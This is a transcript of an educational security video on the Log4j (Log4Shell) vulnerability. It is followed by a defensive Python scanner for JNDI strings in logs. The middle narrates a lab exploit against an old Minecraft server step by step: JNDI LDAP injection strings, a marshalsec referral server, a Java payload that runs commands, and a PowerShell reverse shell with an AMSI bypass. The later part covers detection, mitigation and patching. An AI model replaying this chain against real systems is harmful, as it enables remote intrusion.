Three billion devices run Java, at least according to Java, and it's now known the Log4j package in Java has a vulnerability and can be hacked. Yes, hi. If you're finding this video from the gaming community, whether it be Minecraft or some link or some reference or some tweet, uh, hello, my name is John Hammond. I make cyber security videos here on YouTube, whether it be malware analysis, some dark web dumpster diving, programming and capture the flag, anything in the sense of cyber security. And in this video I want to talk to you about CVE-2021-44228, or this Java logging package called Log4j that is affecting so, so much out on the internet, including Minecraft.

So this vulnerability really picked up some steam on December 9th of 2021, and I was kind of tinkering and working throughout the night to explore and experiment with it. So 5:30 in the morning on December 10th, 2021, I posted this tweet and it got a little bit of traction, and just following that, a few hours later, I was finally able to get remote code execution and fully take advantage of a Minecraft server, and I promised I'll upload a video. So in this video I would like to showcase how I put together that exploit, that proof of concept. I'd like to showcase the other applications and scenarios you might find this vulnerable package in, and I want to talk about what the industry is doing about this. I want to talk about some of the detection, some of the prevention efforts. I want to talk about the different bypasses, so both the blue team aspect and the red team aspect, and I want to just bring as much information to you as I can.

Now, I have a hunch this is going to be a long video, so I will do my best to include timestamps in the description so you can click along to different chapters of the sections that you might be most interested in. I will be showcasing the Minecraft segment, uh, probably up front, because I think a lot of folks might be really interested in that, but please bear in mind Minecraft is just the tip of the iceberg and
how many software applications and programs that this vulnerability affects. This is a zero day, and what's so damning about this is that it's a cluster bomb of zero days, because that Log4j package might be in so many other programs and software provided by different vendors and manufacturers. And while we, you might be able to patch your individual installation or your code base that's using this Log4j application, the vendors that are trickling and pushing their own code downstream, you might have to be kind of sitting on your hands waiting for that provider to push their security update.

So at this point a significant number of companies, organizations, businesses, software providers, security vendors are all talking about this. Twitter is talking about it, the whole internet is talking about it, different spaces of the world, whether you're in cryptocurrency, blockchain, NFTs. This is seriously something that is a hot topic right now. We're all trying to understand, hey, who is affected, what is impacted, and because this is baked into some different applications and programs, it's hard to find and detect and know what is in fact vulnerable.

So the first couple of blog posts that originally came out from this, I think around December 9th, were LunaSec. I think LunaSec was first to the punch and kind of getting some information out there. Uh, it explains more of the vulnerability in the details, uh, and I've showcased and written that in some of my own blogs, which I have linked in the description. In fact, I will do my best to include just about everything that I showcase within this video in the links in the description below.

An original proof of concept and exploit code has already been released and is public out on the internet. In fact, this GitHub has now been updated since it was originally hosting some other information. It now goes into even more detail and showcases other bypasses and some internal details of how this vulnerability works. Alongside this, there are numerous other repositories
and information online as to how you could perform this attack and how you could set this up in a local testing environment if you don't have software that you already know is vulnerable.

Just for some super quick show and tell, I do want to bring to light, uh, an example of us using this Log4j exploit. There are a lot of repositories that will showcase how you can set up your own test environment or simple Docker container where you can explore this vulnerability, with lots of other references to other details and information behind it. Uh, this repository does offer a Docker container and explain how you can use and abuse this, so I'll go ahead and git clone this and showcase it over here on my terminal. Let's move into the temporary directory. I'll go ahead and git clone this here, and now I move into this directory. Uh, we can view that README file, and it explains how you could build this instance. You'll want to docker build this image, and for the sake of showcasing I will go ahead and just do this as root, uh, so I will go ahead and docker build this system. Let it work. If you don't have Docker installed, you can typically do a sudo apt install docker.io, add your user to the group, and I've showcased that in other videos. Once that is complete, we can review the README one more time and get an idea for how to set this up. Looks like it runs the Docker container with removing it after it's completed, mapping ports 8080 to 8080.
Uh, for the sake of me trying to roll with this, I'm gonna change that port to something that is not in use, and now I will open another terminal to work with this on the side. I'll move back into that same directory, cat the README one more time to see how we can use this. If we wanted to make a curl request with a poisoned user agent, we could specify the header there with the JNDI inject, or the syntax that might let us actually see a connection come back. Uh, I'll go ahead and verify what my Docker instance is. Let me sudo bash one more time and I will ip a s docker0. Looks like I'm running on 172 11701, so let me go ahead and start up a netcat listener on, I suppose, port 888, and I will open yet another terminal where I can go ahead and run the curl command that is explained in that README file.

You can see, hey, if you want to make a curl request with the poisoned payload, you can set a user agent header. Now this user agent will need the JNDI syntax that uses LDAP to make a call back to where your listener is, or your attacker-controlled server, uh, and you'll connect that to, okay, the target that you actually want to see here. Let me go ahead and make that curl request. I'll copy and paste this and make those quick changes. I'll bring this up where you could see it. Now let's make these changes. As we saw from the ip a s output, the Docker instance is running at 172.17.0.1, and I have the netcat listener running currently on quad 8, and we are connecting this to our vulnerable service, which is the Docker instance running, I believe, on port 555 as we had set. Now you could see, maybe just barely in the background, we did get our connection, and if we actually pivot back over to go see the instance, we can see, hey, we did in fact see a connection with the user agent that would get logged and bring us back, make the call back to our attacker-controlled instance, in this case just my netcat service.

So now let's showcase how this can be done in an old and unpatched Minecraft server, which I've been using
really as a testbed to showcase the impact and educate users and bring the messaging that this is a sheer insane vulnerability. Let's hop over to the computer screen.

Now I'm on the Windows side. I'm using Windows to go ahead and host the Minecraft server, also using that as the client to connect to the Minecraft server, so truthfully this isn't showcasing the impact for all of the other potential players in a Minecraft server. But I'm over here on this desktop and I've gone ahead and set up a PaperMC, uh, Paper Minecraft server. Paper Minecraft apparently makes it super duper easy. I kind of had to learn and do some quick juggling on the fly, how do I actually set this up, never done it before. So if you wanted to go ahead and download Paper, you very well could. On the hamburger icon here you could go to the downloads button and scroll down to check out some of the information. You can notice that Paper 1.18 and some others actually have their update and already have patched for the vulnerable incident with Log4j. If you wanted to go take a look at some of the legacy packages that are in fact vulnerable, if you were trying to recreate this on your own, you would be able to see, hey, you could download some of these other previous ones. Uh, truthfully, doesn't look like it's hosting some of the others that it might have seen here, because this vulnerability has been so massive. I'll showcase some of the other footage here where I actually had seen the previous releases. Now they've taken them down and off the website.

In full transparency, I ended up setting this up with an old Paper Minecraft, or PaperMC, server version 1.88. I was able to track down the downloads for this by just kind of exploring how they structured each of their download directories, and I had ended up finding that given a version and build number you could search for that download specifically. If I move into this downloads directory, let me see, oh, it doesn't actually display any directory indexing. That's okay. Can I get
specifically the version that I had downloaded previously? And I made sure to save this link. This is 188 build 443. Let's see if it is still being served and hosted, and no, it has currently been taken offline. That's a good thing. Now there won't be as many vulnerable Minecraft servers out there on the internet.

This Paper Minecraft server, and Minecraft all in general, does require Java, and I wanted to again go for an old school version of Java where I know this would be vulnerable, because I just wanted to showcase this exploit and get it to work. So I ended up finding some repositories where I could go ahead and download this online, and in fact, when I was still wanting to work with Java 8, I ended up finding that portableapps.com did in fact showcase and host some of these older versions. I wanted Java 8 1 8 1, which I could find for my 64-bit version of Windows here. Upon downloading that, I was able to go ahead and set things up, and I moved the installation of Paper here onto my desktop and just a folder here where you can see that specific version number, 18443. Alongside it I set up a start paper batch script, which, if we just wanted to take a look at, all it simply does is it runs Java, which is the version that I just downloaded, 180 181, running this jar file. And let me show that to you super quick. I do have it in my path, so I can run java -version, and that is the version that I'm working with.

You'll notice my username is santa. I'm super sorry, uh, I know this is supposed to be a cool professional learning video, but this is the virtual machine that I had used to prepare the TryHackMe Advent of Cyber learning challenge, so fun easter egg for current viewers that I have. If you're new to the channel, uh, go check out that video.

So with that I could move into my desktop and I could run that start paper dot batch script. This will go ahead and start up the Minecraft server. If you haven't done this before, it does require you to agree to the end user license agreement, which is
simple. All we need to do is open this file and change eula to true. Nice and easy, and now let's restart that again. So at this point the Minecraft server is running. I'll drag this over to the side here, and I'll go ahead and get started with my Minecraft launcher.

Now when I bring this up, I am running the Java edition of Minecraft, and you can actually see, hey, there is some messaging and notification about the security vulnerability in this edition. If you want to go check out that page, Minecraft explains and tells you a little bit more about it, and this in fact tells you what you need to do to try and remediate or mitigate against this vulnerability. It does explain that the latest versions, 1.18, as you've seen that number around, is in fact patched and secure. If we actually go take a look at the installations, you might be able to see the patch notes even here, and this Minecraft Java edition 1.81 explains that this release fixes a critical security issue for multiple servers and that client version is patched, so upgrade Minecraft if that's what you're using.

Now again, for the sake of showcasing, I had gone into installations and I had clicked on new installation to go find myself a different version or old school rendition of Minecraft, and in fact I had been using that 1.8, way down below, 1.88. Now this explains that 1.88 is an older version that doesn't support the latest player safety features. Totally understood, however I want to just explore this vulnerability. If I go ahead and hit play here, this will go ahead and start up Minecraft for me, and I'll resize the window to make this a bit more visible.

So I'll move into multiplayer. So I have set up this Minecraft server, which is one that I simply added, being the local IP address of this computer. If you aren't sure how to get that, you can simply open up the command prompt and ipconfig will show you, hey, your current IP address. Now I'll go ahead and connect to this Minecraft server, but I'll bring this window to the other side so we
can kind of see these side by side. Of course we'll go ahead and log in, and we can see that, hey, my user has connected, and here I am being a Minecraft YouTuber. My mouse sensitivity is like super crazy, I don't understand this. So the danger in this Minecraft game is that if I were to enter into the chat anything that I really wanted to send to other players, this is where the injection point is.

So now that we've set up the vulnerable Minecraft server and the victim client, let's go figure out how the attacking machine is set up. I am going to move out of this virtual machine, bring this over to the side here, and I do have a Kali Linux instance, which is where I'll be showcasing how we could do this. So if you haven't seen it from any of the descriptions or anything that I've been showcasing thus far, the way that this payload executes is by a JNDI, or the Java Naming and Directory Interface, syntax. It makes a call out to an LDAP server, which will then be configured with a referrer to send it back to an HTTP server, which will then execute and work with more code. Thus the victim will then execute arbitrary code hosted by a hacker or bad threat actor.

So if we are trying to recreate this locally, we need something to be able to actually host this LDAP referrer server for us. Now from the research that I had done thus far, this can be done with this marshalsec utility, which is some great research done by other individuals showcasing this JNDI injection technique. Looks like they have actually updated their README here to explain, hey, if you're looking for information on the CVE for Log4Shell, this is what you could understand and learn more about it. Scrolling down, we can see the usage here to explain how to build and put this all together. It does note Java 8 is required, in which case I had gone and tracked down the, again, older version of Java and JDK so that I could be able to recreate this. Notice I'm trying to use Java 8 all across the board between the Windows victim and the Kali
Linux attacking machine. I will open up another terminal window and I'll show you the Java version that I'm currently running is 1.80181, the same rendition on the Windows machine. I had downloaded this from this mirror root pai in their JDK listing, grabbing that specific version number, but if you went to this page you would get a secure connection issue, in which case you can just visit this with HTTP instead, and there we go. This is a good listing of those different version numbers you might want. Again, I'm working with Java 8u181, and you can download that tar gzip file, extract and run this as needed.

Now going back to set up and work with this marshalsec utility, let's get back to our terminal, and I'll just make a temporary directory for me to work with in here. I'll go ahead and git clone this repository, move into that directory, and it said for the installation process you will need Maven, uh, M-A-V-E-N, which again you can sudo apt install if you do not yet have it. Go ahead and run that command and it will go ahead and build this package for us in the targets folder. As a reminder, this marshalsec utility sets up our LDAP referrer. It's not our payload, but it sets it up so that we could then send a malicious payload.

What we had seen previously, when we did that Docker connection, we had just ran with a netcat listener, and let me view my IP address to be able to showcase this. Uh, we have 100166. Let me start up a netcat listener on 999, I suppose, and I'll bring this window over to the side where, over in my Minecraft instance, I could go ahead and run that malicious command. Looks like I see it's night time, so let me go ahead and try and type in the syntax here. I will use that dollar sign prefix in front of the curly braces, and it's jndi colon ldap colon slash the IP address that we want to connect to, which is that LDAP listener, right? So if I were to try and go to this IP address, uh, given the port, looks like I forgot the port there, so I need colon 999.
We will see the connection come back. If I actually take a look at the logs of the server, you'll notice the original prefix didn't have those 999 port number there, but the other one did, and that's not being displayed here. We can see some damage potentially starting to be done with this, right? But that is the starting step. Now we need to actually set up this referral server to host malicious code.

So let me hop back to this Kali virtual machine. I'll stop this netcat listener and review the syntax to run this. Now there are a lot of examples showcasing how to do this. If you were to simply just search on GitHub for Log4j, let me look for specific repositories throughout all of GitHub, there will be a lot of potential proof of concepts, the original one that we saw and others. This one specifically, zha zhan 325, was telling me a little bit more of how to actually set this up. You'll notice that you will need to host your own HTTP server with code that you can compile and have it do whatever you'd like, and then use this marshalsec service with the syntax to go ahead and run the JNDI LDAP referral server, telling it what you want it to send it to with a specific class name or Java code that you would then like to execute.

So let's go ahead and grab the syntax, move it back to our terminal and run this code here. I want this to call back to my IP address, which we saw from the IP address that I am 10 1 6 6 as the last octet, and we'll go ahead and host a server on 8000.
And there we go, we'll set this up, and you can see it is running an LDAP server locally, or on all interfaces, on port 1389. Now we would want to prepare our HTTP server hosting Java code that will then be executed on the target.

So let me open another terminal here and I'll move back a directory, and I'll show you how they kind of explain this in that repository. Here you can see there's a java folder that indicates, hey, you have the source code for Log4j RCE, being the proof of concept or exploit that you'd like to run, and then this showcases some example vulnerable code and how it might actually work. Using the Log4j logger, it sets up any boilerplate things necessary, and then eventually, if it tries to log some information, specifically this payload syntax, right now it will reach out and then execute it because of our LDAP referral server.

So let me show you this code that they're using. They just use a simple public class with the class name that matches the file, a static method and a specific function for it. Interestingly enough, they also include the syntax that might execute arbitrary commands or do some damage that you would really want to do. So let's try and, again, hippity-hoppity, your code is now my property, slap that in here. Let's go ahead and create a poc directory. I will go ahead and mousepad a log4jrce.java, and then I'll slap this in to this text editor here, saving this file so we get our syntax highlighting. We could have this display whatever we'd like, but truthfully I want to clean this up and have it execute a command to demonstrate our proof of concept work here, and clean this up just a smidge. I'll remove that line and the java.lang nonsense, so we'll just run the Runtime exec command, and we can pass in a string that we might want to run. I'll go ahead and start with a simple payload for calc.exe.

Now with that complete, we can go ahead and compile the specific Java syntax. I'll use javac and go ahead and compile our log4jrce. If I ls in my current directory, we can
see that that class file has been created, and now we want to be able to publicly host this on a port that we'll have our server call back to. So I'll go back to that other intermediary terminal here, move some things around so this is easy to see, and I'll go ahead in Python 3 http.server, so I am hosting a simple HTTP server at the moment.

With that we now have everything set up, so I'll move out of this Kali Linux instance. While the listener for LDAP in the referral server is waiting to send it back to this 8000 port, we can then see how this looks from the Minecraft point of view. I'll drag this over, switch back to Minecraft and run the same command, but now use something specific, or I'll go to 100166, but now we're listening on port 1389 specifically for LDAP, and we know that we want to run that log4jrce. So now when I hit enter on this, look carefully at the left-hand side of the screen where Kali Linux and our attacker machine is running. We'll see the connection come with the very top window from LDAP, then we'll see it come down to our HTTP server, and we should see the calculator application pop up on the Windows victim.

So I just tested it one more time to ensure that it works, and I wanted to make sure you'd be able to actually visually see the impact, but my face was in the way in the video, so I want to drag the camera up. So let me run the exact same command and look carefully. I'll hit enter, and there you can see we saw the connection come through from LDAP, we see the HTTP request, and down at the very, very bottom of this Windows machine you can see that the calculator application has been started, even twice, because it made two requests there. And with that we have proven remote code execution on the victim through Minecraft. We just hacked Minecraft.

But obviously I'm using a very simple, benign, innocent payload of just opening the calculator application. This grants an attacker the ability to do whatever they want. They could start up a cryptocurrency miner, they could begin
a remote access trojan, maybe a Cobalt Strike beacon, they could drop ransomware, it's really whatever they'd like. So for another proof of concept, let's actually get a shell on this machine using Minecraft in this JNDI Log4j exploit.

For the sake of demonstration, I'm going to make sure that Windows Defender is off. Uh, you should absolutely ensure that Windows Defender is on, you should be really using a solid antivirus. So I'm clicking in here and verifying that in managed threat detection, let's turn real-time protection off. There we go. And now in our attacker machine, let's go ahead and Google for a PowerShell reverse shell syntax, uh, and we could really grab any of these. Let me just grab a one-liner. Uh, PayloadsAllTheThings has some great ones, but this one should work just as easily for us. I am going to try to rip this, and I am going to want to PowerShell encode this, uh, base64. I think there's like a rye raiku this thing. I want to be able to base64 encode this so it's a quick and easy sample. Uh, this will however need to be bypassing AMSI, or the Antimalware Scan Interface, so just for the sake of showcasing again, I'll go to amsi.fail, Flangvik's tool that does incredible stuff. Let's grab a Rasta Mouse bypass, AmsiScanBuffer patch syntax. It's just showcasing C#, and I believe that will be fine with new lines, but I'm not quite sure, so let's go ahead and find out. Uh, we will want to modify our reverse shell syntax to actually call back to our attacker machine, right? So let's use 10.0.0.166 yet again, um, and then let's use a different port this time, I suppose, um, 9898. Now let's go ahead and encode this. There we go, and I have all of this giant disgusting PowerShell syntax, but let's go modify our exploit code and see this in action. I'm going to use mousepad yet again to modify our log4jrce Java script, and then replace where we were originally just running calc.exe. Let's go ahead and slap all of this in, and let's just see if this works. I'm not a
thousand percent confident, but let's try to use javac to compile this yet again, um, and now that that's been done, we can start up a netcat listener on port 9898. Let's move our Kali Linux instance over to the left-hand side of the screen. Let's go back to the game and try and run the same thing again, where we see the connection, and we do have a connection in netcat. So if I were to bring that up super quick, let me try and run the whoami command just to verify we are on the box, and yes, I am santa running on the desktop of that victim Windows computer. And now I could do anything. I could, I could do privilege escalation, I could do lateral movement, I could add persistence, I could be a threat actor and do any portion of the attack kill chain, the cyber kill chain, and do some later damage.

So that is that vulnerability showcased within Minecraft, but there is so much more to this. Minecraft is just one small piece of this cluster bomb of a zero day. Now I only want to show you this in the context of old, deprecated, legacy, unpatched Minecraft. Minecraft has itself patched for Paper server versions, the latest rendition for the Minecraft client, etc., and I wanted to just raise awareness with how this might affect the gaming community to keep those players safe. You should be running antivirus so those threats don't come through, you should be updating, you should be patching, you know the drill.

So now I've shown you the red team perspective from the adversary, at least in the case of Minecraft, but let's talk about the greater repercussions and how the industry is responding to this for blue teaming and defense and protection and detection. What I had showcased in those simple proof-of-concept examples in the Docker container or within Minecraft were just a flat, vanilla, basic syntax. However, there are now being lots of different bypasses or attempts to kind of obfuscate it or hide it so it's not easily detected or is trapped and not stopped by web application filters, and we are seeing lots of
active in the wild exploitation of this. This doesn't really have any specific target, it's not targeted, right? Anyone could just spray and pray across the internet. Some of the great folks over at GreyNoise are in fact seeing, hey, active exploitation from different actors and different IP addresses. In fact, they've created a tag to be able to categorize and determine, hey, okay, if we want to do some better research and actually get some specific host names and IP addresses that defenders could use to block at the edge, or just have the threat intelligence that is now all public and out and about. They've shared some great gists, or again snippets of code and text and information, out on GitHub. If you have any interest, again, these links will be in the description, but you can see about a hundred at first, now about 150. I don't believe this link has been updated just yet, but those specific IP addresses, and then what in fact is the syntax that they're using, or what payload are they actually firing back. We could actually use this to maybe potentially examine what payload is being used. If you could still find this online, reach back out to it, pull down the payload and commands detonated. But look at this significant number.

A couple of the really interesting ones are in fact using one well-known and kind of easily off-the-shelf accessible GitHub repository that just shows how to do this JNDI exploit with the command base64 included in the URL. That one's actually worthwhile and really interesting, because the base64 code itself, like the command that's being run, is present, and you can find that within logs.

There are other great tweets, other great individuals showcasing, kind of again acting as a megaphone to amplify this information, how you could track it down, know what's required for this attack to be pulled off, how you can mitigate it, etc. Another researcher, Florian Roth, has started to create, again, more detection efforts and his own utility, a Python script that might help you look for
this sort of activity, all the malicious indicators inside of your own logs. If you're working with the server that could very well be vulnerable to this, use this, take advantage of it, explore it. If you feel like you need to go do this fire fighting within your own organization, these are some great resources, and it truly shows the community coming together here.

At the moment, the real threats and the payloads that we're seeing included in this active in the wild exploitation have so far just been cryptocurrency miners and botnets. Now that's not to belittle or trivialize those, but we aren't currently seeing remote access trojans or Cobalt Strike beacons, ransomware. This could very well be further down the line with more days of exploitation, some ransomware armageddon.

Additionally, there is some chatter out on the Twitterverse that this attack vector, this JNDI injection technique, has been known and publicized and talked about. In fact, there was a presentation back at Black Hat USA in 2016 all about this sort of attack and what could be done from it, and it says right there, if we dive into it, applications should not perform JNDI lookups with untrusted data or user input. Now there are a lot of people very upset that if there is this five-year-old attack vector, this vulnerability that we could have known about, and there is even some chatter looking back at like the reports and bug fixes and pull requests for this project, bringing in this feature, quote-unquote, now becomes this bug and potential vulnerability. A lot of people are not all that happy.

Now with that said, there is no shade or hate or any bad mouthing towards those developers. This is not a reflection of them. Uh, it's not, they do this work volunteer, right? This is a project, this is a labor of love, this is a passion that they enjoy, and we should not by any means be offering any discomfort or malice towards them. This is just the world that we're in right now and what could come from this vulnerability.

Now in case some
of you might be saying, hey John, it's been a day, you know, December 10th is kind of when you got this thing popped on Minecraft, December 11th is when you're recording and releasing this video, what the heck have you been up to? Well, I have been trying to fight fires here, right? You know, be in the trenches, raise the awareness, keep pushing the education, get the threat intelligence out there, talk to folks, reassure them if need be, help determine what is vulnerable and what isn't vulnerable, and a lot of that can be reflected in the blog that I had written through my own day job and employer, Huntress. Hopefully that offers a little bit more insight on kind of what we've been up to and, uh, how we can help.

One thing that we are very, very pleased with, and I'm very proud we were able to get across the finish line, is that there is now a free, open and accessible utility, open source, you can find the source code on GitHub, that I will showcase, a Log4j shell tester. So if you don't know what application might be vulnerable to this or is using the Log4j package somewhere in its internals, you can slap in a payload, like the same syntax, the JNDI and LDAP code that I was using in Minecraft, as the user agent in that simple Docker image proof of concept, and you can test, like the best verification of the validation that you could get: does it make a connection, does it call back to something remotely? There is no code that executes on your machine, nothing is like deployed or detonated on the target, on the victim. It's simply doing a lookup and doing a quick check and connection, hey, do we actually see the vulnerability here? And the source code is available on GitHub. If you for some reason, hey, don't trust us, you want to review it and make sure that it's doing nothing other than making that connection, that is available for you.

For another quick show and tell, let me showcase how you can actually use that Huntress Log4Shell vulnerability tester. Let me spin up that Docker testing environment one more
time, and I’ll go ahead and actually try to exploit this with the payload that is generated and given here. So I’m going to open up yet another terminal. So I will go ahead and select this payload, and then I will go ahead and run that curl command as we saw previously, using a specific user agent that allows us to just pass this in. We’ll slap it and paste that payload, and again, we want this to connect to currently listening localhost for my testbed on port quad 5. Now when I hit enter, we should see that there were some connections down below, and that has logged. So if I go view the connections given our Huntress Log4Shell tester here, we will see that, oh, there’s my IP address, there is the connection time, and I could use this to verify that application that I was using was in fact vulnerable.

I hope this helps people across the industry, because the hardest thing about this vulnerability is that it could be baked in to so many different programs and applications, and we just don’t know unless we were to try and test this. Like, you could look for, hey, files that might be named log4j, but that has both false positives and false negatives, because you might not know the version number or you might not know if it’s actually in use between some portion of the application. So hopefully having this to send a benign payload and just be able to test and see the connection will give you a sanity check, yes, no, something a little bit better than just blindly guessing. And hey, just as a reminder, uh, this is just copy and paste. You don’t need to have the technical chops to be using curl, you don’t need to be setting user agent, you literally just need that syntax and slap it into anything that you see: put it into input forms, put it into user logins, put into things that you just might access any page with, or something that could very well be logged in any application. It’s just a matter of copying and pasting and trying it.

Okay, I think it’s time I try to wind this video down. Um, it’s been a long
video, and I know there’s a lot of info. I’m showcasing a lot of stuff, but I want to show just how much you could see, you could learn, you could explore if you went out and looked around, if you stayed up to date with your vendors, your software suppliers, the providers that you work and integrate with, uh, and check to see, hey, is the application that I might be using vulnerable, with hopefully some of the tools accessible, with the information that you now know, and hold them accountable, right? Like, we... this takes a village, this takes everyone playing in concert. And I hope that’s been some incredible thing for you to see, is this absolute outpouring of everyone in the industry, on Twitter, in different facets of the world that we live in, uh, rising together to tackle this thing, because it’s big and bad. And not to be fear-mongering, not to be, hey, fear, uncertainty and doubt, but honestly, uh, we’re doing everything that we can. You know, we’ve been working some sleepless nights. I know that you have, probably, listening and watching this, you just as well. But we are just at the front of it, and I have to think we might see this vulnerability for years to come, because there might be software that just won’t update and push this. Maybe it’s dead or deprecated or legacy code. This very well is like another Shellshock-like vulnerability in its sheer scale, and we’ll see it from now on.

So my lasting thoughts, right, as we start to tune this video out: thanks for sticking with it to the end. Uh, hey, I hope you learned something. I hope this showcased something cool, something interesting, uh, and helps get you more in the know as to what is going on. And if you’re an organization fighting fires in the trenches, you need this help, hopefully you have some other resources that can better help you. Lots of links in the description, hopefully timestamps just as well. Thank you so, so much for watching this. I hope that it offers you something new. And if you’re coming from the gaming community, if you’re over
there, one of those Minecraft fellows to check this video out, please stay, please stick around, take a look at the channel and see what other new things you could learn, because you are working on a computer, you are playing with technology and software and security, and that’s not something that you can just kind of set and forget, or put over in the corner, or put your feet up on the dash and wait for incidents to happen. You have to earn security. You have to fight for it every single day. So thanks so much, I’ll get off my soapbox. It’s been fun, everybody. I hope you learned something. I love you, and I’ll see you in the next video.

Video Information
This video, titled ‘CVE-2021-44228 – Log4j – MINECRAFT VULNERABLE! (and SO MUCH MORE)’, was uploaded by John Hammond on 2021-12-11 23:30:08. It has garnered 328167 views and 12936 likes. The duration of the video is 00:34:52 or 2092 seconds.
Timestamps (HUGE thanks to deetee in the comments for putting these together!!!):
Detection:
https://twitter.com/thinkstcanary/status/1469439743905697797?s=21
https://twitter.com/an0maious/status/1469350532548632581
https://twitter.com/an0n_r0/status/1469643986403008515
Threats:
https://twitter.com/zom3y3/status/1469508032887414784
Bypasses:
https://twitter.com/Rezn0k/status/1469523006015750146
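The transcript mentions hunting for the malicious indicators in your own logs. The following is an added example, not code from the video or from Huntress: a small scanner that flags JNDI lookup strings in access-log lines and pulls out the callback target for triage. The log lines and hostnames are constructed, and the collapsing of nested lookups is a heuristic assumed here so that encoded or wrapped forms are still caught.

```python
import re
from urllib.parse import unquote

# Innermost ${...} expression (no nested "${" inside it).
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization: captures protocol and host[:port].
JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s]+)", re.IGNORECASE)

def _collapse(match):
    """Replace a non-JNDI lookup such as ${lower:j} with its trailing value."""
    inner = match.group(1)
    if inner.lower().startswith("jndi:"):
        return match.group(0)          # keep the JNDI lookup itself intact
    return inner.rsplit(":", 1)[-1].lstrip("-")

def normalize(text, max_rounds=5):
    """Percent-decode and collapse nested lookups until the text is stable."""
    for _ in range(max_rounds):
        collapsed = INNER.sub(_collapse, unquote(text))
        if collapsed == text:
            break
        text = collapsed
    return text

def scan(lines):
    """Return (line_number, protocol, callback_target) for every hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for proto, target in JNDI.findall(normalize(line)):
            findings.append((number, proto.lower(), target))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:10:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://callback.example:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:10:02:15 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '203.0.113.44 - - [11/Dec/2021:10:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://other.example/x}"',
    '198.51.100.7 - - [11/Dec/2021:10:04:40 +0000] "GET /docs/log4j-jndi-faq HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, proto, target in scan(SAMPLE_LOG):
        print(f"line {number}: {proto} callback to {target}")
```

A hit in the logs shows that a request was attempted, not that the application was vulnerable; the callback target is what to look for in outbound connection records.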